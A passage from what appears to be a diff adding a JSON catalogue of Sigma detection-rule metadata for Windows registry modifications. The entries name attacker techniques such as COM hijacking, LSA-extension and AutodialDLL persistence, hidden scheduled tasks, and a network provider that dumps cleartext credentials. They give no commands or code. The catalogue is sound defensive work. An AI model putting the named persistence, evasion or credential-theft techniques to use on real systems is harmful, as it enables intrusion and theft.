"https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/07/17", + "filename": "registry_set_fax_dll_persistance.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "value": "New File Association Using Exefile", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/11/19", + "filename": "registry_set_file_association_exefile.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence using GlobalFlags in image file execution options", + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "GlobalFlags Registry Persistence Mechanisms", + "meta": { + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" + ], + 
"creation_date": "2018/04/11", + "filename": "registry_set_globalflags_persistence.yml", + "author": "Karneades, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", + "value": "Add Debugger Entry To Hangs Key For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/wer_debugger.html", + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_hangs_debugger_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "This value is not set by default but could be rarly used by administrators" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "value": "Persistence Via Hhctrl.ocx", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/hhctrl.html", + "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_hhctrl_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": 
"registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Hides the file extension through modification of the registry", + "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", + "value": "Registry Modification to Hidden File Extension", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2022/01/22", + "filename": "registry_set_hidden_extention.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modifications to the hidden files keys in registry. 
This technique is abused by several malware families to hide their files from normal users.", + "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "value": "Modification of Explorer Hidden Keys", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/04/02", + "filename": "registry_set_hide_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", + "value": "Registry Hide Function from User", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/03/18", + "filename": "registry_set_hide_function_user.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "uuid": 
"5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "value": "Hide Schedule Task Via Index Value Tamper", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/08/26", + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/01/22", + "filename": "registry_set_ie_persistence.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", + "value": "Register New IFiltre For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/ifilters.html", + "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_ifilter_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate registration of IFilters by the OS or software" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "uuid": "d223b46b-5621-4037-88fe-fda32eead684", + "value": "New Root or CA or AuthRoot Certificate to Store", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/04/04", + "filename": "registry_set_install_root_or_ca_certificat.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/05/28", + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Persistence Via LSA Extensions", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_lsa_extension_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "value": "Adwind RAT / JRAT - Registry", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2017/11/10", + "filename": "registry_set_mal_adwind.yml", + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", + "value": "Blue Mockingbird - Registry", + "meta": { + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ], + "creation_date": "2020/05/14", + "filename": "registry_set_mal_blue_mockingbird.yml", + "author": "Trent Liffick (@tliffick)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Persistence Via Mpnotify", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/mpnotify.html", + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_mpnotify_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", + "value": "NET NGenAssemblyUsageLog Registry Key Tamper", + "meta": { + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/11/18", + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", + "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", + "value": "New Application in AppCompat", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/1", + "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/05/02", + "filename": "registry_set_new_application_appcompat.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "informational", + "falsepositive": [ + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." 
+ ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "value": "New Network Provider - Registry", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/08/23", + "filename": "registry_set_new_network_provider.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "uuid": "63647769-326d-4dde-a419-b925cc0caf42", + "value": "Enable Microsoft Dynamic Data Exchange", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.002" + ], + "creation_date": "2022/02/26", + "filename": "registry_set_office_enable_dde.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", + "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "value": "Office Security Settings Changed", + "meta": { + "refs": [ + "https://twitter.com/inversecos/status/1494174785621819397", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/05/22", + "filename": "registry_set_office_security.yml", + "author": "Trent Liffick (@tliffick)", + "level": "high", + "falsepositive": [ + "Valid Macros and/or internal documents" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "value": "Stealthy VSTO Persistence", + "meta": { + "refs": [ + "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" + ], + "tags": [ + "attack.t1137.006", + "attack.persistence" + ], + "creation_date": "2021/01/10", + "filename": "registry_set_office_vsto_persistence.yml", + "author": "Bhabesh Raj", + "level": "medium", + "falsepositive": [ + "Legitimate Addin Installation" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. 
Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", + "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "value": "Outlook C2 Registry Key", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], + "creation_date": "2021/04/05", + "filename": "registry_set_outlook_c2_registry_key.yml", + "author": "@ScoubiMtl", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the manipulation of persistent URLs which could execute malicious code", + "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "value": "Persistent Outlook Landing Today Pages", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2021/06/10", + "filename": "registry_set_outlook_registry_todaypage.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the manipulation of persistent URLs which can be malicious", + "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "value": "Persistent Outlook Landing Pages", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + 
"https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2021/06/09", + "filename": "registry_set_outlook_registry_webview.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Change outlook email security settings", + "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "value": "Change Outlook Security Setting in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2021/12/28", + "filename": "registry_set_outlook_security.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential persistence using Appx DebugPath", + "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "value": "Windows Registry Persistence DebugPath", + "meta": { + "refs": [ + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", + "https://github.com/rootm0s/WinPwnage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" + ], + "tags": [ + "attack.persistence", + 
"attack.t1546.015" + ], + "creation_date": "2022/07/27", + "filename": "registry_set_persistence_appx_debugger.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "value": "Persistence Via AutodialDLL", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", + "https://persistence-info.github.io/Data/autodialdll.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/10", + "filename": "registry_set_persistence_autodial_dll.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "value": "COM Hijacking For Persistence With Suspicious Locations", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/07/28", + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Probable legitimate 
applications. If you find these please add them to an exclusion list" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "value": "Persistence Via MyComputer Key and SubKeys", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/09", + "filename": "registry_set_persistence_mycomputer.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "value": "Windows Registry Persistence COM Search Order Hijacking", + "meta": { + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", + "https://attack.mitre.org/techniques/T1546/015/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2020/04/14", + "filename": "registry_set_persistence_search_order.yml", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, C\u00e9dric Hien", + "level": "medium", + "falsepositive": [ + "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", + "value": "Persistence Via TypedPaths", + "meta": { + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/22", + "filename": "registry_set_persistence_typed_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "value": "Modify Attachment Manager Settings - Associations", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_policies_associations_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + 
{ + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "value": "Modify Attachment Manager Settings - Attachments", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_policies_attachments_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects that a powershell code is written to the registry as a service.", + "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "value": "PowerShell as a Service in Registry", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "registry_set_powershell_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adds a RUN key that contains a powershell keyword", + "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "value": "Powershell in Windows Run Keys", + "meta": { + "refs": [ + 
